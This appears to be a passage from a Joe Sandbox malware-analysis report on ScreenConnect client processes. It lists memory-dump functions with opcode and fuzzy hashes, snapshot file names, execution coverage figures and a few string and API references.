Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7577aa1ae32b39dc253084eb24116055eac2a79f88c7f8a0c7698003a394b70d
Instruction ID: 1c3db78d54f90c851547bcb55ea028cdc4ee655c843c0776a0d36c0abb6b922c
Opcode Fuzzy Hash: 7577aa1ae32b39dc253084eb24116055eac2a79f88c7f8a0c7698003a394b70d
Instruction Fuzzy Hash: 3011163590011A9FCF41DFA8D9409DEBBF5FF49314B108555E909FB261D771AA0ACB90

Function 00EE6E64 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c1645e2b18baa45f5978deb3f5eb99c3e4322473a0c76ddffb0b61c522b1f8
Instruction ID: dcc89af70354bdf31ed7d1ab13019decd28650443ec74cdce7486846d4fb06a2
Opcode Fuzzy Hash: 81c1645e2b18baa45f5978deb3f5eb99c3e4322473a0c76ddffb0b61c522b1f8
Instruction Fuzzy Hash: 1801F239B042649F8B049B69D8504ABBBE5EBD83543108A3ED405EB361DBB1ED068BC0

Function 00A3D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1981174460.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a3d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00984849f61a218bc27a9aad5fb3f062036a30bd8ea3b5d6839cca52f2ee0a5f
Instruction ID: 6663b0dc7b2f5b5ef9460024cb258dcbb17454e6afedef10bfa92cf6e5f6feec
Opcode Fuzzy Hash: 00984849f61a218bc27a9aad5fb3f062036a30bd8ea3b5d6839cca52f2ee0a5f
Instruction Fuzzy Hash: 2E01F731408300DAE7144B25E984767BFA8EF42724F18C42AFD1A1B186C2799941C6B1

Function 00EE8168 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7386b0f465e2268969f4bf1d35e05dbb685fa3c63f5f44b04b71ed7d09caa25
Instruction ID: f96c4acd05154c0a3bfe88d9d97d07cf0769d5f1a15fb294571afcda053a8781
Opcode Fuzzy Hash: e7386b0f465e2268969f4bf1d35e05dbb685fa3c63f5f44b04b71ed7d09caa25
Instruction Fuzzy Hash: 70F05836B092546AD728CABAA40069BBBDACBD4624B14807FE58DC3680E931E8018765

Function 00EE12A0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60fead50aabbc4d23d2fe05eea060f0ee1279197be520409f4a44c6bad00364
Instruction ID: f4bfc0319c1b2804ac61596c6b66ea4c25d0bc09191ee5fd3c9be3bdc00baf48
Opcode Fuzzy Hash: c60fead50aabbc4d23d2fe05eea060f0ee1279197be520409f4a44c6bad00364
Instruction Fuzzy Hash: 9EF096392406448FCB16EB7ED95096E7FE1DFC971031581AED116DB624DBB0EC468B90

Function 00A3D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1981174460.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a3d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47589864b8acd832fbb043dac8434f7ad404e66d9d31bd3d549342e7224720c6
Instruction ID: 41d57cfd7bacc5b1d0beb8a2f4c5bfcd56ddf4794d3e74ace28f9b9e5cb9a20e
Opcode Fuzzy Hash: 47589864b8acd832fbb043dac8434f7ad404e66d9d31bd3d549342e7224720c6
Instruction Fuzzy Hash: F2F0C271008340EEE7148F16D884B62FFA8EB52724F18C45AFD491F286C3799841CAB0

Function 00EE8158 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939d3e98779a486794ae5c3da6d5bd335092471bfc3222a6c1bd52d79ec214d3
Instruction ID: ac66fbf3111847cab26b173a219c59f7f8532fabb7cbcc92066fb26d68cbe5dc
Opcode Fuzzy Hash: 939d3e98779a486794ae5c3da6d5bd335092471bfc3222a6c1bd52d79ec214d3
Instruction Fuzzy Hash: 8CF0E536A0D2909FC715CBBA980099BBFE9DF9A210704C1BFD48DC3140E9349406CB26

Function 00EE1414 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02d4be547e5da56ba61aefb6f84242a3a4884101d242a352bdc70aacce88364
Instruction ID: ef3b08afff1f05b3071f7f806e0a96e37dfeb9ddf7d6ea981c99c98c85bb2584
Opcode Fuzzy Hash: c02d4be547e5da56ba61aefb6f84242a3a4884101d242a352bdc70aacce88364
Instruction Fuzzy Hash: B9F0246300C2D08FC322C778A8512987FA0EE923107490ADAE0828F6A6D768E94DC361

Function 00EE5F68 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b2007a225876d327c0191a2a96687c9fcb1039db9d1ee4c8f2da957775a2aa
Instruction ID: 4c76c92fac6b3986251813a1af02a8c013baa55f51099a64c07d6c80e3ae52f1
Opcode Fuzzy Hash: d7b2007a225876d327c0191a2a96687c9fcb1039db9d1ee4c8f2da957775a2aa
Instruction Fuzzy Hash: 86F0E533709B899FC71156599C40051BBDA9E8A35DB2C85B1F414DB281F711CC11C341

Function 00EE12B0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7795bb4be2f773da453ca62fc4e1ed0e6602bbb255337d0af57b0eb817f67afd
Instruction ID: 8016202a69a90a9b3b2fca0afbf91609f8a94c5c72943f219e9363140ddba4e5
Opcode Fuzzy Hash: 7795bb4be2f773da453ca62fc4e1ed0e6602bbb255337d0af57b0eb817f67afd
Instruction Fuzzy Hash: 4BF0E539300A048F8B02AAAEE81086E77D5DBCDB10300807DE115DB314DFB1EC454BD0

Function 00EE1DA1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0162085e737fb30fc542c127d628af1b79817db3106a065f9374f7dad056b13
Instruction ID: 6037d73739940f167ff190f9bc83b6ec6a13e143c7f79cd7b9d608bd19959199
Opcode Fuzzy Hash: c0162085e737fb30fc542c127d628af1b79817db3106a065f9374f7dad056b13
Instruction Fuzzy Hash: 8CF0A03E7092605FC34597B8A85846A3FA29ECB221314816AE90AC73A1CEA148168751

Function 00EE6EF4 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3ab17cd9b93ee1466dad5dd2cefc1e63f03680424c17d8d682e5e5ebbc3a852
Instruction ID: 260e4338f3e21aced68cf0fb1478b816ba792c17234b2da973378d05cbd4a325
Opcode Fuzzy Hash: d3ab17cd9b93ee1466dad5dd2cefc1e63f03680424c17d8d682e5e5ebbc3a852
Instruction Fuzzy Hash: 9AE022397443205BCB046AAA348812EBAD6ABC9761300443DF50AC3340CE654C068350

Function 00EE6EF8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b623354d2d5e0e8c685b75b9100c0151f9b496ac9eb126cc23e555d2bd525f3
Instruction ID: 40671ad8a7407681b032ed0bf08c7c4bfada576288c8ece6e5f15789952a12d2
Opcode Fuzzy Hash: 7b623354d2d5e0e8c685b75b9100c0151f9b496ac9eb126cc23e555d2bd525f3
Instruction Fuzzy Hash: 90E0DF3A700324578B046EAA788812EBADAEBC96A6740443DF20EC3340CE658C0683A0

Function 00EE5F78 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa318f0618d687ea489533248b9bd1bd3f578284797672160e6f5e00cb691d90
Instruction ID: 0a2976359ddc1a11d6db7bbfb61e289ac832ffdf34bb50a3aab4c9ad00093378
Opcode Fuzzy Hash: fa318f0618d687ea489533248b9bd1bd3f578284797672160e6f5e00cb691d90
Instruction Fuzzy Hash: 89E08C33B01DA99B8B10919E9C44555B3CA8B993ADF3C9671F828EB381FB21DC02C381

Function 00EE0838 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc53133eaebbd57ce4f11c2e368a61763195f4b76a6aa257e983f305ea7263f2
Instruction ID: 484421752fe471c2519a759a7ecd31a34564787cc7aae2597e70f65d029f00f5
Opcode Fuzzy Hash: dc53133eaebbd57ce4f11c2e368a61763195f4b76a6aa257e983f305ea7263f2
Instruction Fuzzy Hash: 32E06D34549284EFCF01EFB8E9909AD7BB0EF46300B1002EED405DB222D6741E06DB00

Function 00EE1DB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3752c0d2aa1404e7f30c5643304c2d710bb3f4a9a3525fec1854e4aaae61a321
Instruction ID: 3044bf5aca0734a7e4c9df4e419fd6893b08a2722784a615f5f26d6def101655
Opcode Fuzzy Hash: 3752c0d2aa1404e7f30c5643304c2d710bb3f4a9a3525fec1854e4aaae61a321
Instruction Fuzzy Hash: 63E0863E7012245B8244ABBDE84845E7BEAEBCA2723108126F90EC3390CF718C0387A1

Function 00EE1DF8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee116c2eed79f08609cb662d625f50cf6052c5bbc3bd25c7faf251e361ad063e
Instruction ID: 3e289496382fef4da718e19448ba68b268e9f154cd916eb8a4fe82690fe3bd6f
Opcode Fuzzy Hash: ee116c2eed79f08609cb662d625f50cf6052c5bbc3bd25c7faf251e361ad063e
Instruction Fuzzy Hash: 23E0D87494A248DFDB40DBB4D95049DBBB0EF0730171044DAD409DB152D6705F08E751

Function 00EE7FB8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed5069c49cebeedecac7445fceb7f5e017ddd0b52b9388bbee83a4a9cf563a33
Instruction ID: e08080e6c43ef23bdba1bed61ae94882275818d6f1c0900af112e164ef6fcd7d
Opcode Fuzzy Hash: ed5069c49cebeedecac7445fceb7f5e017ddd0b52b9388bbee83a4a9cf563a33
Instruction Fuzzy Hash: 6DE0DF3048D3829FC3428B64D8462C17FE0EF02320F0448AAE5858F183D379A857CBA2

Function 00EE1821 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d4b27cbc77cf0857410824a3bea144dd6b8c543f02cd711474510b78d385e4
Instruction ID: 3cda52b36e7964e80935255149a7f3acbdadd6c983ff5005f56606f7697a94a4
Opcode Fuzzy Hash: 89d4b27cbc77cf0857410824a3bea144dd6b8c543f02cd711474510b78d385e4
Instruction Fuzzy Hash: 7EE0863D606520CFC748ABB0E40C45C77A2FF8635574140B5E90A87325CB76CC42CF40

Function 00EE13D8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced3708b358ebf11fadabbee1d885e72127a9d5cdfade5dabbbcbab65eaea36c
Instruction ID: 323ba511c15f3988d581f319374eda1d191bf15a40fb9bb3f4d8294834e15334
Opcode Fuzzy Hash: ced3708b358ebf11fadabbee1d885e72127a9d5cdfade5dabbbcbab65eaea36c
Instruction Fuzzy Hash: 4BE08C3220C6510FC725EA68F8417DDABD2ABC1320B044AADE1414B659CBA1EE8887A0

Function 00EE1318 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c9e76ca6ec3322cb0e6ab7ae9479c7b5823c6f07466b12f397d63060af732f
Instruction ID: a4d72fa24f035439275bbf3ba68263c9b5d375c7f35dfbf42244c06971e45216
Opcode Fuzzy Hash: 70c9e76ca6ec3322cb0e6ab7ae9479c7b5823c6f07466b12f397d63060af732f
Instruction Fuzzy Hash: 14E01270D151099FCB80EFBC894159EBFF0EB0D214B1486EEC85EE7601E63285128F81

Function 00EE8128 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa2271e69c38e5173a69ac59641746b9d4d9f7ea44e25881d9d02786258e6658
Instruction ID: 2a55d43eefa7f78a70de3708f0ed844ee2fa6257a5d24228c4f4053eca01e887
Opcode Fuzzy Hash: fa2271e69c38e5173a69ac59641746b9d4d9f7ea44e25881d9d02786258e6658
Instruction Fuzzy Hash: 21E02BB04442414BC340CF68F5480D97BD0EB62324F84055DD5405E502D736948BC742

Function 00EE0848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01957bcdb47475e8ac31a005d68f650a4bad4c17a8dafcf3457f800bec1c7f4
Instruction ID: c5e9b4fab32eaf7601a22a61fb91940a65691c0e8f6ebf20288dcbc672a4f228
Opcode Fuzzy Hash: f01957bcdb47475e8ac31a005d68f650a4bad4c17a8dafcf3457f800bec1c7f4
Instruction Fuzzy Hash: B3D01734A01208EF8B00EFA8EA4195DBBB9EB85300B1042A9E408D7210EA316F029B80

Function 00EE1E08 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1982045135.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ee0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a824903c64781b87403720f49deb6cfbe87426d53be8d230810280b96fbe185e
Instruction ID: 48418e68563d6a2ef09a333ccfba82cb1daa2a1a357fa535a39f806ed2aa023f
Opcode Fuzzy Hash: a824903c64781b87403720f49deb6cfbe87426d53be8d230810280b96fbe185e
Instruction Fuzzy Hash: 48D05B75A0120CEFCB40DFB4E94155DF7F5EB49301B1045A9D808D7304DA715F049B90

Analysis Process: ScreenConnect.ClientService.exePID: 2364, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Executed Functions

Function 00CCFB40 Relevance: 2.8, Strings: 2, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00CCFB83
W, xrefs: 00CCFE6D

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: W$d
API String ID: 0-763733440
Opcode ID: 548f2992e4eed4979abe4682a7e02fba38d5562e8a2fb44e4591681e4f0428f7
Instruction ID: 910d50a278a6feeb8079620e0e35fb7931b1ffaf5d83d931a0a8fa3b0b49b07c
Opcode Fuzzy Hash: 548f2992e4eed4979abe4682a7e02fba38d5562e8a2fb44e4591681e4f0428f7
Instruction Fuzzy Hash: 7DD15E75A40705CFCB04DF68C994A99B7B6FF89310B218669E819AB365DB30FD85CF80

Function 00CCC67F Relevance: 2.8, Strings: 2, Instructions: 272
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 00CCC841
$^q, xrefs: 00CCC84D

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 04c435f1aac1862c1c958002eaa6bf18d3fc9e7b44f95f8e4c3521199a5d9f33
Instruction ID: 7655ff608e66fa008b1f51a11965cc523006332b4aaebfc7771d617e8b785822
Opcode Fuzzy Hash: 04c435f1aac1862c1c958002eaa6bf18d3fc9e7b44f95f8e4c3521199a5d9f33
Instruction Fuzzy Hash: 8EB17030A00359CFDB05EFA8C498AAEBBB1FF85304F11856DD459AF265DB70D986CB80

Function 00CCEF78 Relevance: 2.7, Strings: 2, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(&^q, xrefs: 00CCF0A9
(bq, xrefs: 00CCF1C8

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (&^q$(bq
API String ID: 0-1294341849
Opcode ID: 95fe099e68fa8e81643dd55ec5128c89575785262ea75601adb599c3722190b8
Instruction ID: 59a9683cb97ea7847adc775cd5ce16bba0582d301c5c14db77cb2461eb836cb9
Opcode Fuzzy Hash: 95fe099e68fa8e81643dd55ec5128c89575785262ea75601adb599c3722190b8
Instruction Fuzzy Hash: 60617231F002198BDB14EFB9C450AAE7AF2AFC4700F24852DD416BB385DF74AE428791

Function 00CCAAA0 Relevance: 2.7, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 00CCAC2B
W, xrefs: 00CCAAAD

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q$W
API String ID: 0-4052592664
Opcode ID: 1ebc5acb044a1a69d4034881b78606719f9751c945ba364c5e31983e96e017d4
Instruction ID: 1a9ba6b41fffc905c7b25d47b9cbe7bbed9e91a56df52f1643e5af531572e697
Opcode Fuzzy Hash: 1ebc5acb044a1a69d4034881b78606719f9751c945ba364c5e31983e96e017d4
Instruction Fuzzy Hash: 9D51F630B002199FDB159F68D868B6FBBF2BF84709F14856DD856DB291DB309D81CB82

Function 00CC7E50 Relevance: 2.6, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xez, xrefs: 00CC7EB9, 00CC7F0B
(bq, xrefs: 00CC7E71

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq$xez
API String ID: 0-1218309740
Opcode ID: 8e757d16bcb84c45f549e454f9e1583f136cfdefc6aa436805c771ad90e04bea
Instruction ID: 97c527ad9061595344f5b348cf553d93b09d62570a88f9b7805205c12cff200a
Opcode Fuzzy Hash: 8e757d16bcb84c45f549e454f9e1583f136cfdefc6aa436805c771ad90e04bea
Instruction Fuzzy Hash: FB41EF31A00105CBCF15EFA8E990A6EBBB6EF84301B14C6A9D8069B355DB70ED46CF90

Function 00CC4C63 Relevance: 2.6, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`Q^q, xrefs: 00CC4DEB
`Q^q, xrefs: 00CC4C86

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: `Q^q$`Q^q
API String ID: 0-4048626156
Opcode ID: f2df0230832edacd3e578f16fe4efc7b5886b2b023852094996873cf3617ff74
Instruction ID: 7cc149a7c6fb8722980c9a30bfcf2e519ca3b18179f1ffb692b81290387969fe
Opcode Fuzzy Hash: f2df0230832edacd3e578f16fe4efc7b5886b2b023852094996873cf3617ff74
Instruction Fuzzy Hash: 98419A71A00329DFDB24EF68C818BADBBB5FB45300F1081E9D559A7280DB745A89CF92

Function 00CC5410 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 00CC5425
$^q, xrefs: 00CC5431

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 831433cd90b4334e7c648dc886a24471082a978f05ecd5ea950d0730b3488dad
Instruction ID: bab7067efd38391171f4fa280d6b6602974d9d500530b4bc4e85d22e4f74aa84
Opcode Fuzzy Hash: 831433cd90b4334e7c648dc886a24471082a978f05ecd5ea950d0730b3488dad
Instruction Fuzzy Hash: DBD09E7074060C8FD72CDE69D944E1137E97B44B1176148ADD5158F335DE21FCC5C655

Function 0398FE90 Relevance: 1.6, APIs: 1, Instructions: 65
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConnectNamedPipe.KERNEL32(00000000), ref: 0398FF08

Memory Dump Source

Source File: 00000008.00000002.3555841912.0000000003980000.00000040.00000800.00020000.00000000.sdmp, Offset: 03980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3980000_ScreenConnect.jbxd

Similarity

API ID: ConnectNamedPipe
String ID:
API String ID: 2191148154-0
Opcode ID: a1033529231c63da8846074807c6b5170e1b49cda591a5d6884df7fa0caee488
Instruction ID: 9503b079d24897c4724bef036eee5f47da28a7bae37c0f796b2c0897ec8238d6
Opcode Fuzzy Hash: a1033529231c63da8846074807c6b5170e1b49cda591a5d6884df7fa0caee488
Instruction Fuzzy Hash: D92113B1D00258DFCB24DFAAD484B9EFBF5AF89304F148069E859AB350CB749945CFA4

Function 00CC8D98 Relevance: 1.4, Strings: 1, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 00CC8DBA

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: d118155551475a10e49df5cbecef89a70872becc3f44d4615d81f5bdd0603c32
Instruction ID: 5f5179aa1f356162c8aff956b60952631b88a814352832175d07b02a0c39768a
Opcode Fuzzy Hash: d118155551475a10e49df5cbecef89a70872becc3f44d4615d81f5bdd0603c32
Instruction Fuzzy Hash: 32610538B106098FDB04DFA8D894E6EB7F2FF89315B1580A9E506EB365DB30ED058B40

Function 00CC5DF0 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

nCvq, xrefs: 00CC5ED1

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq
API String ID: 0-3590779759
Opcode ID: 607f8faefa81b532b9eddf6fb8838d8cdb878b9189df2c70fe5caa653968a381
Instruction ID: e89ce6a73d405a1dca746566d309686e5e84785bef9dec077af8e7f9c5078fdd
Opcode Fuzzy Hash: 607f8faefa81b532b9eddf6fb8838d8cdb878b9189df2c70fe5caa653968a381
Instruction Fuzzy Hash: 01519070B00A058FDB18DBB9D954B6E77E6EB88310B2084BCE416D7361EF74ED468B91

Function 00CCC6F1 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

$^q, xrefs: 00CCC841

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 4326fe0ea83361a3a169a48a5cb89cb7901bcfcee6a0517f0faf8539e165c219
Instruction ID: 6e344c35bd3aa4f486e8309f24d0a1f06979be73a51fcb96f829af6b2bbce8b1
Opcode Fuzzy Hash: 4326fe0ea83361a3a169a48a5cb89cb7901bcfcee6a0517f0faf8539e165c219
Instruction Fuzzy Hash: D8513C30A00719CFDB14EFA5C498AADB7B2FF85304F11896DD45AAB365DB70E985CB80

